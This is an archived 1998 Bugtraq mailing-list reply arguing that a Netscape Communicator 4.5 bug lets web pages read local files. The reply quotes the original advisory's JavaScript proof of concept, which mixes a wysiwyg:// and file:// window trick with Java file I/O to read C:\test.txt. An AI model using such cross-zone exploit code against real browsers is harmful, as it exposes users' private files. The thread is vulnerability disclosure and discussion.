[8629] in bugtraq
Re: Netscape Communicator 4.5 can read local files
daemon@ATHENA.MIT.EDU (Ryan Russell)
Wed Nov 25 00:15:36 1998
Date: Tue, 24 Nov 1998 20:23:25 -0800
Reply-To: Ryan Russell <Ryan.Russell@SYBASE.COM>
From: Ryan Russell <Ryan.Russell@SYBASE.COM>
X-To: Bill Lavalette <BillL@METAINFO.COM>
To: BUGTRAQ@NETSPACE.ORG
It's vastly different. Did you try creating c:\test.txt and putting
something in it, and going to that page? Notice that it pops
the first line in a dialog box. That means it has that info
under programmatic contol, and can send it across the network
back to the web server, exactly as claimed in the original
advisory.
Contrast that with (you) opening your c: drive with Communicator.
You can browse local files, but only you get to see the contents,
and that window isn't under any kind of programmatic control
from other windows... at least that's how it's supposed to work.
It's similar to the Java sandbox concept. Local and signed
content are "trusted" and can do whatever they like, whereas
remotely loaded content are "untrusted" and aren't supposed
to be able to perform certain operations. When you (well,
Netscape and Microsoft) try to mix the two, invariably mistakes
will be made, and leaks will happen between the two.
Ryan
Hi -
this appears to be no different then typing c:\ in the location of any
browser hardly a security hole in my opinion the test site did not
prove that this is a potential or current problem.
Bill
>Demonstration is available at:
>http://www.geocities.com/ResearchTriangle/1711/b6.html
>
>The Javascript code is:
>
>sl=window.open("wysiwyg://1/file:///C|/");
>sl2=sl.window.open();
>sl2.location="javascript:s='<SCRIPT>b=\"Here is the beginning of your
>file: \";var f = new java.io.File(\"C:\\\\\\\\test.txt\");var fis = new
>java.io.FileInputStream(f); i=0; while ( ((a=fis.read()) != -1) &&
>(i<100) ) { b += String.fromCharCode(a);i++;}alert(b);</'+'SCRIPT>'";
>
